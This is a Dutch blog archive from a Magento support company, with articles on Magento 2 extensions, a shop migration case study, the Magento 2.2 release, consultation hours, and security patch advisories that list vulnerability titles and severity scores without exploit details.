    2FA, ook wel bekend als “Two Factor Authentication” geeft een enorme versterking in de veiligheid van jouw Magento shop door extra beveiligingsgegevens toe te voegen. Naast de gebruikersnaam en het wachtwoord wordt een beveiligingscode (een eenmalig wachtwoord) vereist om in te loggen. De beveiligingscode wordt gegenereerd door uw smartphone (de tweede factor). Elke beveiligingscode kan slechts één keer gebruikt worden en is alleen geldig gedurende 30 seconden.

    Ultimo

    Ultimo is een Magento Theme met een geavanceerde admin module. Het is uiterst aanpasbaar, makkelijk te gebruiken en geoptimaliseerd voor SEO.

    Mage.Coach

    Ontwikkeld door onze eigen SupportDesk CTO, Ray Bogman, heeft Mage.Coach hoog gescoord in de Performance hoek. Mage.Coach bestaat uit een combinatie van open source tools die helpen jouw Magento shop pagina’s sneller te maken. Het is geheel gratis en makkelijk te gebruiken. Je vult jouw email-adres en het adres van jouw webshop in en binnen één minuut krijg je een mail toegestuurd met een uitgebreid rapport inclusief eventuele verbeterpunten.

    MageReport

    De tweede tool op het gebied van security. MageReport, ontwikkeld door Byte, is een platform waar je gratis security checks kunt doen voor jouw Magento shop. Een aanrader voor elke Magento shop eigenaar of developer om periodiek jouw shop hierdoorheen te halen. Na het invullen van de URL doet het platform een check van jouw Magento shop en zie je in een mum van tijd:

    • Welke patches wel en niet geïnstalleerd zijn
    • Hoe goed je beschermd bent tegen Brute Force attacks
    • Visbot malware beveiliging
    • EM_Ajaxproducts RCE beveiliging
    • En nog tal van andere beveiligingszaken

     

    Yoast SEO

    Yoast SEO helpt Magento 2 shops hun SEO op orde te krijgen. Bij blogs en productpagina’s kijkt Yoast niet alleen naar technische SEO instellingen van de site, maar ook inhoud zelf. Het geeft adviezen over “keywords” in de tekst en afbeeldingen en checkt de leesbaarheid van jouw teksten. Kortom, een handige (deels) geautomatiseerde checklist waarmee jij met jouw teksten en afbeeldingen makkelijker meer “punten” scoort tijdens zoekresultaten.

    SOOQR

    SOOQR is een krachtige zoekmachine tools voor jou webshop. Het stelt klanten in staat sneller, beter en makkelijker te zoeken naar producten en diensten in jouw Magento shop. De tool heeft veel zoekfuncties, filters en is een stuk ongevoeliger voor spelfouten.

    Accelerated Mobile Pages (AMP)

    Accelarated Mobile Pages (AMP) is een technologie die ervoor zorgt dat jouw Magento shop een stuk sneller laadt, wanneer deze wordt geopend op een mobiel of tablet. AMP brengt naast een snellere laadtijd ook andere belangrijke voordelen met zich mee.

    • Een betere ranking in Mobile Google Search Results.
    • Genereert aparte mobiele pagina’s voor de thuispagina, Categorie pagina’s, productpagina’s en CMS pagina’s zodat deze optimaal aansluiten op de nieuwste Google AMP technologie.
    • Gemiddeld een halve seconde snellere laadtijd voor mobiele pagina’s.
    • Hogere conversie.

    ;

    Remote SMTP

    Remote SMTP Stelt je in staat om je transactionele emails vanuit een andere e-mail server te sturen in plaats van vanuit je eigen webserver. Dit betekent dat als jij al je bedrijfsemail bij bijvoorbeeld Google heb staan, dat je de Google servers kunt gebruiken om jouw mail te sturen. Hiermee verminder je de kans dat jouw email in de anti-spam filter van de klant verdwijnt en, als bijkomend voordeel, dat je zelf geen smtp hoeft te hosten. Op technisch vlak wordt die ook positief ontvangen doordat de tool met weinig configuraties goed werkt en snel in te stellen is.

    Magento 2 kwam langzaam uit de startblokken op het gebied van extensies, met name voor de Nederlandse markt. Hierboven is echter te zien dat de afgelopen jaren hard aan de weg is getimmerd aan kwalitatief goede extensies. Meer dan 50 extensies kwamen met goede ervaringen uit deze avond en bieden goed perspectief over hoe Magento 2 zich ontwikkeld op de Nederlandse markt.

    Gerelateerde artikelen

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Condoom Anoniem: De eerste Magento 2 Open Source shop in een Magento Cloud (Commerce) omgeving

    Magento 2Condoom Anoniem staat er om bekend een early adopter te zijn als het gaat om technologie. Zo wilde het bedrijf enkele jaren geleden al een van de eerste zijn met een Dynamic Serving oplossing voor hun Magento multi-store. Deze keer is de “early adopter move” de stap naar een Magento 2 shop.

    Naast de persoonlijk interesse van R. Spooren (oprichter, Condoom Anoniem) in de nieuwste online technologieën, was de stap naar Magento 2 ook gemaakt vanuit technisch en commercieel oogpunt. Naast het feit dat Magento 1.x in de nabije toekomst zal ophouden te bestaan brengt Magento 2 ook veel verbeteringen met zich mee op het gebied van performance, security, architectuur en toepasbaarheid van nieuwe technieken. Een beter presterende webshop die kan meegroeien met het toenemende aantal klanten zal leiden tot meer conversie.

    Wat heeft SupportDesk gedaan?

    Combineer een fanatieke early adopter, Condoom Anoniem, met een creatieve innovator, SupportDesk, dan je krijgt natuurlijk een waanzinnig vernieuwend project. Daarom zeggen we dan ook met gepaste trots, dat we weer een uniek Magento 2 project ter wereld hebben gebracht.

    Niet alleen heeft SupportDesk de migratie van Magento 1 naar Magento 2 gerealiseerd, ook hebben we de eerste Nederlandse Magento 2 Open Source shop gemaakt in een Magento Cloud (Commerce) omgeving. Een hele mond vol maar we leggen zo uit wat dit allemaal betekent, laten we het voor nu “Magento Commerce Ready” noemen. Het is inderdaad een term die wij net hebben verzonnen, maar dat mag als je echt iets nieuws hebt gecreëerd.

    Platform.sh is het “platform of choice” van Magento voor de Magento Cloud (Commerce) editie. Dit platform is gebouwd voor grote webshops wat betekent dat het volledig gemanaged wordt, veilig is, praktisch oneindig schaalbaar is en dus veel bezoekers aan kan zonder verlies van performance. Voor Magento ligt voor Platform.sh echter de nadruk op de woorden "Cloud" en "Commerce", dit heeft te maken met technische inrichting van het platform.

    SupportDesk heeft, in overleg met Platform.sh, een Magento 2 Open Source webshop gemaakt (Condoom Anoniem) in een Magento Cloud (Commerce) omgeving . in aanvulling op Platform.sh wordt Section.io gebruikt voor het versnellen en beveiligen van Condoom Anoniem. Daarnaast fungeert Section.io ook als content delivery netwerk, waardoor de site wereldwijd sneller beschikbaar is. Voor meer informatie over de keuze voor Section.io, Ray Bogman (CTO, SupportDesk) heeft een uitgebreide presentatie gegeven over het verschil tussen Fastly en Section.io op Meet Magento Duitsland 2017.

    Wat heeft SupportDesk opgeleverd?

    Condoom Anoniem is niet alleen de eerste Magento 2 Open Source webshop die op het Magento Cloud (Commerce) platform draait, ook neemt het een paar van diens functionaliteiten over. Zo is de snelheid van de website toegenomen, kan het aantal bezoekers toenemen zonder performance problemen en is de architectuur zo ingericht dat een eventuele upgrade naar Magento Commerce veel sneller en makkelijker te realiseren is.

    “ Ray Bogman (CTO) beveelt deze toepassing aan voor (snel) groeiende Magento shops”
    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento 2.2 is nu beschikbaar!

    Magento 2.2Magento 2.2 is er! Sommige hadden Magento 2.2 al een paar releases eerder verwacht maar de kogel is door de kerk. De Magento 2.2 release brengt een tal van verbeteringen, bugfixes en nieuwe functionaliteiten met zich mee voor zowel de Magento Open Source (OS) als Magento Commerce editie. We zullen hier kort en bondig proberen samen te vatten wat de bijna 30 pagina tellende release note van Magento 2.2 allemaal met zich mee heeft gebracht.

    De belangrijkste innovaties van Magento 2.2

    Er is een hele waslijst aan verbeteringen, functies en bugfixes doorgevoerd die zowel voor de Magento Open Source edities als de Magento Commerce editie van toepassing zijn. Daarnaast zijn er voor Magento Commerce nog additionele innovaties bijgekomen. Hieronder eerst de lijst met de veranderingen en verbeteringen voor beide edities.

    Significante beveiligingsverbeteringen in het platform

    • Onbeveiligde gesprekken kunnen vanaf heden niet meer plaatsvinden
    • extra beveiliging tegen code execution attacks
    • Verbeterde beveiliging tegen cross-site scripting (XSS) attacks

    Ondersteuning van PHP 7.1, Varnish 5, MySQL 5.7 en Redis 3.2

    De ondersteuning van PHP 5.6, Varnish 3, Solr is komen te vervallen. Magento 2.2 ondersteund enkel nog versies vanaf:

    • PHP 7.1
    • Varnish 5
    • Redis 3.2
    • MySQL 5.7

    De bibliotheken van derden partijen zijn allemaal geüpgraded naar de laatste stabiele versie. Hoewel de ondersteuning voor Solr komt te vervallen in deze release, blijft de Solr code in de Magento code base tot een latere versie.

    Pipeline Deployment

    Een nieuw implementatieproces stelt de gebruiker is staat om bouw-en implementatiestadia te gebruiken om de downtime van het productiesysteem voor site-updates te minimaliseren. Het beheer van de Pipeline Deployment is makkelijker gemaakt zodat configuraties tussen omgevingen makkelijker zijn uit te voeren. Hierdoor kunnen intensieve werkzaamheden tijdens het proces makkelijker op de “build-server” worden uitgevoerd.

    Prestatieverhogingen door verbeteringen in de Indexeringen, winkelwagen en cache

    Klanten kunnen browsen en winkelen in de webshop terwijl indexers op de achtergrond draaien, zonder zichtbare impact bij de klant. Daarnaast werken langlopende indexers in batches (groepen) om het geheugen beter te kunnen beheren. Met de nieuwe winkelwagen oplossing kunnen klanten een winkelwagen maken met meer dan 300 line items en de verkoper kan nu een winkelwagen met minstens 300 line items exporteren. Varnish cache configuratie bevat nu ook een “Saint” en “grace” modus die ervoor zorgen Varnish altijd een gecachte pagina aan de klant aanbiedt in de shop. Voor meer verbeteringen, bugfixes en functies van Magento Open Source 2.2.0 release kunt u hier klikken.

    Magento Commerce 2.2.0 & Magento Cloud 2.2.0

    Voor Magento Commerce 2.2.0 en de Magento Cloud 2.2.0 edities zijn ook nog de onderstaande verbeteringen doorgevoerd.

    Krachtige functies voor Magento Commerce B2B

    Het “path to purchase” is het hele verkoopproces, van lead tot verkoop en aftercare, bij de klant. Voor de B2B kant heeft Magento diverse nieuwe krachtige functies toegevoegd die de behoeften van deze markt nog beter ondersteunen. Bedrijven kunnen nu eigen accounts creëren en onderhouden, elk met teams van klanten en daarin verschillende rollen en niveaus aan toewijzen. Magento Commerce B2B bevat ook een flexibele API die integreert met een groot verscheidenheid aan ERP-systemen van Magento partners.

    Magento Commerce starter

    Naast de Pro versie komt Magento Cloud (Commerce) nu ook in een kleinere, platform-as-a-service (PaaS) versie, Magento Commerce starter. Er zijn wel verschillen in het aantal functies tussen de starter en pro versie, deze kunt u hier lezen.

    Nieuwe fraude protectie met Signifyd

    Signifyd werkt samen met Magento Commerce. Deze geïntegreerde dienst zorgt voor een verbeterde fraude protectie. Het proces hierachter kunt u hier lezen.

    De Magento 2.2 update brengt een hoop verbeteringen met zich mee op het gebied van beveiliging, prestatieverbeteringen en krachtige nieuwe functies. Ook is er met de Magento Cloud starter editie een belangrijke stap gezet om Commerce Cloud toegangkelijker te maken.

    wij raden onze klanten zo spoedig mogelijk te updaten

    wij doen dat graag voor u. Mail ons via het supportaanvraagformulier of bel ons op 020 337 59 61

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • SupportDesk lanceert het Magento Spreekuur!!

    magento spreekuurOp dinsdag 10 oktober zal SupportDesk het eerste Magento spreekuur lanceren! Vanaf 10 oktober zal om de week op dinsdag tussen 14:00 en 15:00 de gelegenheid zijn om met een Magento expert te praten.

    Het zoeken naar het juiste antwoord op een Magento vraag kan een tijdrovende klus zijn. Eindeloos het internet afstruinen hopend op het perfecte antwoord verstopt in een blog, artikel, forum of YouTube video heeft menig mens de moed in de schoenen doen laten zinken. Dit kan anders vonden wij.

    Bij SupportDesk krijgen wij dagelijks te maken met allerlei soorten Magento 1 en Magento 2 vraagstukken. Ook op menig Meet Magento events bekleedt Ray Bogman (CTO SupportDesk) al jaren de rol van Magento Doctor, waar hij advies geeft over nieuwste Magento onderwerpen. Dus heb je hulp of advies nodig voor jouw Magento shop of ben je van plan een Magento shop te starten? Stop met het afstruinen van het internet en plan geheel vrijblijvend een gesprek in met een van onze Magento experts tijdens een van onze Magento spreekuren.

    Geen idee wat je precies moet vragen of heb je er nog niet bij stilgestaan? Deze Magento vragen passeren bij ons regelmatig de revue:

    • Zijn Magento Security Patches belangrijk?
    • Hoe meet ik de performance van mijn Magento shop?
    • Hoe migreer ik van Magento 1 naar Magento 2?
    • Is Magento 2 wel de juiste keuze voor mij?
    • Ik wil een webshop starten, is Magento de juiste keuze voor mij?
    • Wanneer zet ik de stap tussen Magento Open Source en Magento Commerce?
    • Is er een stap tussen Magento Open Source naar Magento Commerce?
    • Moet ik een Mobile Magento shop hebben?

    Het Magento spreekuur: wat moet ik doen?

    Ook het aanmelden voor het Magento spreekuur hebben we zo makkelijk mogelijk gemaakt.

    Stap 1. Klik op de grote oranje knop onderaan de pagina om je aan te melden voor het Magento spreekuur en stel je vraag.
    stap 2. je krijgt: 1) misschien een paar verdiepende vragen terug omtrent jouw Magento vraag. 2) Een paar tijdstippen waarop jij jouw Magento spreekuur kunt inplannen.
    Stap 3. Je krijgt een link toegestuurd waarmee je, op het door jou gekozen tijdstip, een live gesprek krijgt met een van onze Magento experts, die jouw vraag het beste kan beantwoorden.

    De Magento spreekuur agenda

    De Magento spreekuren zullen plaatsvinden op de volgende tijden:

    • Dinsdag 10 oktober 2017 tussen 14:00-15:00
    • Dinsdag 24 oktober 2017 tussen 14:00-15:00
    • Dinsdag 7 novemver 2017 tussen 14:00-15:00
    • Dinsdag 21 november 2017 tussen 14:00-15:00
    • Dinsdag 5 december 2017 tussen 14:00-15:00
    • Dinsdag 19 december 2017 tussen 14:00-15:00

    Meld u hier aan voor het Magento spreekuur

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Is Nederland Magento 2 Ready? [update]

    Magento 2 extensies voor NederlandMet de komst van Magento 2 zijn er steeds meer webshops die nu (of in de toekomst) over gaan stappen naar dit nieuwe platform. Magento 2 biedt ongekend veel mogelijkheden om al jouw E-commerce wensen te vervullen en jouw webshop naar het volgende niveau te tillen. Maar geldt dit wel voor de Nederlandse markt? Het onderzoek van SupportDesk geeft hier antwoord op!

    Het Magento 2 platform en belang van Nederlandse extensies

    Het Magento 2 platform werkt uiteraard in Nederland maar is (deels) afhankelijk van de toevoegingen van derde partijen. Deze partijen (extensie leveranciers) leveren onder andere de Magento extensies die land-specifieke vragen oplossen. Denk hierbij aan een extensie voor IDEAL (specifiek voor Nederlandse betalingen), een Nederlandse Postcode extensie voor verzendingen en software om je administratie en belastingen te managen. Je kunt je voorstellen dat bijvoorbeeld bij het ontbreken van de optie om met IDEAL te kunnen betalen, de Nederlandse markt een stuk minder toegankelijk is.

    De structuur van het Magento 2 platform

    Het Magento 2 platform kan onderverdeeld worden in 10 onderdelen, ook wel structuuronderdelen genoemd. Elke Magento 2 shop zal gebruik maken van alle of in ieder geval meerdere van deze onderdelen. Afhankelijk wat de Magento 2 shop in Nederland wilt ondernemen zal het op verschillende onderdelen een extensie nodig hebben (denk dus aan IDEAL, postcode check etc). De plattegrond van de Magento 2 structuuronderdelen wordt hieronder afgebeeld.

    Magento 2 organisatiestructuur

    Nederland en Magento 2 Readiness in 2016

    In april 2016 heeft SupportDesk het eerste onderzoek gestart naar deze vraag (deze kunt hier teruglezen). Na het onderzoek, toen vooral gericht op leveranciers, luidde de conclusies dat Nederland niet Magento 2 Ready was. De reden hiervoor was dat veel extensie leveranciers nog huiverig waren voor de kinderziektes in het Magento 2 platform. De leveranciers bleven hierdoor de kat uit de boom kijken tot Magento meer kinderziektes uit het platform zou halen, resulterende in het gemis van enkele belangrijke extensies voor de Nederlandse markt. De Nederlandse Magento 2 situatie in april 2016 wordt hieronder weergegeven.

    Magento 2 Readiness Nederland 2016

    Nederland en Magento 2 anno 2017

    In de zomer van 2017 heeft SupportDesk het onderzoek nogmaals gestart. In hoeverre is Nederland klaar voor Magento 2 anno 2017? Een heel stuk beter! De extensie leveranciers zijn blijkbaar klaar met wachten want zowel in Nederland als wereldwijd zijn het aantal extensies fors toegenomen. Op de Magento Marketplace staat de teller voor Magento 2 extensies onderhand op 2000+, meer dan een verdubbeling ten opzichte van vorig jaar. Op Themeforest heeft het aantal themes voor Magento 2 de 500+ bereikt. Er zijn dus grote stappen gezet het afgelopen jaar. In Nederland heeft deze ontwikkeling zich ook voorgedaan. Het aantal extensies, speciaal gericht om de Nederlandse markt te ondersteunen, zijn flink toegenomen. Omdat we weten dat niet iedereen interesse heeft de hele lijst met extensies, die de Nederlandse markt complementeren, door te lezen geven wij nu alvast de conclusie:

    Nederland is Magento 2 Ready!

    De vorige alinea verraadde het al een beetje maar Nederland is Magento 2 ready! Het wachten is voorbij en de Nederlandse extensie leveranciers zijn op volle kracht bezig Magento 2 extensies de markt in te schieten. Dit heeft geresulteerd dat, halverwege 2017, alle onderdelen van de Magento 2 structuur voorzien zijn van een ruime keuze aan extensies, gericht op de Nederlandse markt. Het enige onderdeel wat, naar onze mening, nog iets meer aandacht nodig heeft is het structuuronderdeel “Sales”. Maar dan kijken we ook wel erg streng! Echter, gezien de snelheid van de ontwikkelingen van Nederlandse Magento 2 extensies zal ook dit onderdeel snel volledig Magento 2 Ready zijn. Het beeld van het Magento 2 platform is dus anno 2017 een stuk groener gekleurd voor Nederland.

    Magento 2 Readiness Nederland 2017De Nederlandse Magento 2 extensies

    Voor iedereen die toch wilt weten wilt weten welke extensies er allemaal bij zijn gekomen, die de Nederlandse markt en jouw Magento 2 shop kunnen ondersteunen, hebben hieronder een greep van het assortiment voor je benoemd.

    Magento 2 Accounting & Finance

    Dit onderdeel is een van de grootste groeiers geweest afgelopen jaar. En gelukkig maar want een goed administratiesysteem bespaart veel tijd en geld. Als je kijkt naar de onderstaande systemen doen we misschien met “administratiesysteem” deze ERP programma’s wat tekort, maar je snapt wat we bedoelen. Waar men vorig jaar nog moeite moest doen om één goed boekhoudprogramma te kunnen vinden voor een Magento 2 shop is er nu gelukkig een brede keuze. De meeste grote spelers zijn onderhand de Magento 2 markt ingestapt en je kunt nu extensies en koppelingen downloaden voor onder andere:

    • Exact Globe
    • Exact online
    • Unit4
    • SAP
    • Pantheon
    • Microsoft Dynamics

    Magento 2 Customer Support

    Zorgen dat klanten snel en makkelijk vragen kunnen stellen, via verschillende kanalen en deze goed te woord kunnen staan is key om een trouwe klantenbasis op te bouwen en de klanttevredenheid te vergroten. Op het gebied van Customer Support is Belco in het spel gekomen. Voor dit Nederlandse bedrijf is een Magento 2 extensie ontwikkeld die zich ontfermt over alle aspecten van customer support van jouw Magento 2 shop.

    Magento 2 Marketing

    Je klanten op de hoogte stellen van een leuke actie of ze een nieuwsbrief versturen? Ook op het gebied van (e-mail) marketing is Magento 2 klaar voor de Nederlandse markt. Op het gebied van email marketing zijn veel (inter)nationale E-mail Service Providers (ESP’s) ook klaar voor Magento 2. Tips over het uitkiezen van de juiste E-mail Service Provider voor jouw Magento shop kun je vinden in deze blog, die wij onlangs gepost hebben. Je kunt voor je e-mail marketing al kiezen uit onder andere:

    • Mailchimp
    • MailPlus
    • Copernica
    • Agile CRM

    Op het gebied van geautomatiseerde marketing en Magento 2 SEO/SEM zijn er ook extensies uitgebracht:

    • The feedback company (Magmodules)
    • Rich Snippets (SupportDesk)
    • Alternate Hreflang Tags (SupportDesk)
    • Blogs (Yoast)

    Magento 2 Payment & Security

    In de eerste alinea was het al een voorbeeld “stel dat je geen IDEAL kunt aanbieden aan je Nederlandse klanten”. Ook de Payment Service Providers (PSP's) zijn niet achtergebleven bij Magento 2. Dit onderdeel hoort ook bij een van de sterkste groeiers van het afgelopen jaar. Het aanbod van Payment Service Providers (PSP’s) is zelfs zo flink gestegen dat het bijna moeilijk wordt de juiste extensie uit te zoeken. Je kunt nu onder andere kiezen uit:

    • Pay.nl
    • Mollie Payments
    • Buckaroo
    • Multisafepay
    • Sisow
    • Ice Pay
    • Klarna

    Magento 2 Reporting & Analytics

    Naast de analytische mogelijkheden van Google Analytics is er nu ook een Magento 2 extensie genaamd “Google Tag manager” uitgebracht door SupportDesk.

    Magento 2 Sales

    Jouw Producten op 1000 verschillende vergelijking sites, marktplaatsen en netwerken plaatsen? Een Nederlands keurmerk voor je webwinkel? Geen probleem. Channable en webwinkelkeur zijn onlangs ook tot de Magento 2 markt toegetreden. Magmodules heeft het meeste bijgedragen op dit onderdeel met Magento 2 extensies voor:

    • Google Shopping
    • Beslist.nl
    • Webwinkelkeur
    • Channable

    Magento 2 Shipping & Fulfillment

    Met Magento 2 extensies voor PostNL, Sendcloud en Postcode NL, voor adres verificatie, zijn pakketjes versturen in Nederland geen uitdaging meer. Internationale klanten maar geen idee hoe je dit moet doorberekenen? Geen probleem, met Shipping Table Rates van Amasty worden automatisch de juiste prijzen berekend voor internationale verzendingen.

    Magento 2 Themes

    Op Themeforest staan 500+ themes voor de Magento 2 shops, met thema’s voor elke branche. Of u nu beautyproducten, sportartikelen, kleding, auto’s of bloemen wilt verkopen, er is bijna al overal een thema voor gemaakt.

    Magento 2 kwam traag uit de startblokken maar heeft het afgelopen jaar hard gewerkt aan het platform en imago. We merken dat het vertrouwen niet alleen in Nederland maar ook in veel andere landen is toegenomen. Grote payment providers zorgen dat nagenoeg alle betalingsmogelijkheden beschikbaar zijn en ook de grote ERP systemen hebben een Magento 2 extensie. Dit geeft vertrouwen aan lokale extensie leveranciers die de lokale (landelijke) behoeftes omzetten in extensies. Nederland is Magento 2 ready!

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Security Update 2.0.16 & 2.1.9

    security releaseOnlangs zijn er 34 veiligheidslekken in Magento 2.0.x en 2.1.x ontdekt en opgelost in een patch. De lekken zijn aanwezig in alle versies van Magento 2.0.x en 2.1.x, zowel Magento Open Source (voorheen Magento Community) als Magento Commerce (voorheen Magento Enterprise) shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar voor de Magento 2.0 en Magento 2.1 reeks.

    Wat zijn de 34 lekken van Magento 2?

    • APPSEC-1800: Remote Code Execution vulnerability in CMS and layouts
      • CVSSv3 Severity: 8.2 (Critical)
    • APPSEC-1887: Arbitrary File Disclose
      • CVSSv3 Severity: 7.8 (High)
    • APPSEC-1850: Arbitrary File Delete
      • CVSSv3 Severity: 6.8 (High)
    • APPSEC-1851: Arbitrary file delete + Lack of input sanitization leading to Remote Code Execution
      • CVSSv3 Severity: 6.8 (High)
    • APPSEC-1567: Order history disclosure
      • CVSSv3 Severity: 6.7 (Medium)
    • APPSEC-1769: Overwrite a Relative Path in Sitemap
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1713: Setup pages expose sensitive data
      • CVSSv3 Severity: 6.4 (Medium)
    • APPSEC-1852: CSRF + Stored Cross Site Scripting (customer group)
      • CVSSv3 Severity: 6.0 (Medium)
    • APPSEC-1482: Security Issue with referrer
      • CVSSv3 Severity: 5.9 (Medium)
    • APPSEC-1502: Stored XSS - Add new group in Attribute set name
      • CVSSv3 Severity: 5.9 (Medium)
    • APPSEC-1494: AdminNotification Stored XSS
      • CVSSv3 Severity: 5.9 (Medium)
    • APPSEC-1793: Potential file uploads solely protected by .htaccess
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1819: Customer login authenticates two different sessions
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1802: Customer registration through frontend does not have anti-CSRF protection
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1493: CMS Page Title Stored XSS
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1755: Anti-CSRF form_key is not changed after login
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1853: CSRF + Stored Cross Site Scripting in newsletter template
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1729: XSS in admin order view using order status label in Magento
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1775: Stored Cross-Site Scripting in email template bypass
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1591: Stored XSS on product thumbnail
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1896: Possible XSS in admin order view using order code label
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1673: Stored xss using svg images in Favicon
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1773: Injection on Page leading to DoS
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1577: Stored XSS in integration activation
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1510: Any admin user can upload Favicon Icon
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1545: Stored XSS through customer group name in admin panel
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1535: Access Control Lists not validated when using quick edit mode in tables
      • CVSSv3 Severity: 5.0 (Medium)
    • APPSEC-1588: Order Item Custom Option Disclosure
      • CVSSv3 Severity: 4.9 (Medium)
    • APPSEC-1701: API token does not correctly expire
      • CVSSv3 Severity: 4.9 (Medium)
    • APPSEC-1630: Anonymous users can view upgrade progress updates
      • CVSSv3 Severity: 4.8 (Medium)
    • APPSEC-1628: Full Path Disclosure Web Root Directory
      • CVSSv3 Severity: 4.4 (Medium)
    • APPSEC-1599: Admin login does not handle autocomplete feature correctly
      • CVSSv3 Severity: 4.1 (Medium)
    • APPSEC-1709: Customer email emumeration through frontend login
      • CVSSv3 Severity: 3.9 (Low)
    • APPSEC-1495: Any user can interact with the sales order function despite not being authorized
      • CVSSv3 Severity: 3.8 (Low)

    Belangrijk!

    Gebruik Magento 2.0.16 of 2.1.9 CE of EE voor alle nieuwe Community of Enterprise installaties en upgrades om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento 2 CLI of Magento 2 setup GUI is het mogelijk de Magento 2 security patch te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Security Update SUPEE-10266

    security releaseOnlangs zijn er 13 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-10266. De lekken zijn aanwezig in alle versies van Magento t/m 1.9/x, dus zowel Magento Open Source (voorheen Magento Community Edition) als Magento Commerce  (voorheen Magento Enterprise Edition) shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar vanaf 1.5 en hoger, maar het betreft hier een issue dat impact heeft op alle versies.

    Wat zijn de 13 lekken van SUPEE-10266?

    • APPSEC-1838: RSS session admin cookie can be used to gain Magento administrator privileges.
      • CVSSv3 Severity: 8.2 (High)
    • APPSEC-1800: Remote Code Execution vulnerability in CMS and layouts
      • CVSSv3 Severity: 8.2 (High)
    • APPSEC-1835: Exposure of Magento secret key from app/etc/local.xml
      • CVSSv3 Severity: 8.2 (High)
    • APPSEC-1757: Directory traversal in template configuration
      • CVSSv3 Severity: 6.1 (Medium)
    • APPSEC-1852: CSRF + Stored Cross Site Scripting (customer group)
      • CVSSv3 Severity: 6.0 (Medium)
    • APPSEC-1494: AdminNotification Stored XSS
      • CVSSv3 Severity: 5.9 (Medium)
    • APPSEC-1793: Potential file uploads solely protected by .htaccess
      • CVSSv3 Severity: 5.8 (Medium)
    • APPSEC-1853: CSRF + Stored Cross Site Scripting in newsletter template
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1729: XSS in admin order view using order status label in Magento
      • CVSSv3 Severity: 5.5 (Medium)
    • APPSEC-1579: Customer Segment Delete Action uses GET instead of POST request
      • CVSSv3 Severity: 5.1 (Medium)
    • APPSEC-1588: Order Item Custom Option Disclosure
      • CVSSv3 Severity: 4.9 (Medium)
    • APPSEC-1599: Admin login does not handle autocomplete feature correctly
      • CVSSv3 Severity: 4.1 (Medium)
    • APPSEC-1688: Secure cookie check to prevent MITM not expiring user sessions
      • CVSSv3 Severity: 3.8 (Low)

    Belangrijk!

    • Gebruik altijd de laatste versie van CE (Magento Open Source) (1.9.3.6)/ EE (Magento Commerce) (1.14.3.6) om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen. 

     

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-10266 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Het bos van E-mail Service Providers (ESP) tools

    email service providersJe ziet door de bomen het bos niet meer. Dit is een gezegde dat veel naar voren komt bij het zoeken naar de juiste module voor een webshop. Onder andere op het gebied van e-mail marketing komen er steeds meer tools bij, en de keuze om de beste tool te kiezen voor jouw Magento shop wordt er hiermee niet makkelijker op gemaakt. Elke e-mail marketingtool, ook wel E-mail Service Provider (ESP) genoemd, beloofd een scala aan opties te hebben die jouw webshop naar het volgende niveau kan tillen op het gebied van branding, e-mail-marketing, conversie en nog veel meer. En ze zijn hier allemaal, al zeggen ze het zelf, de beste in.

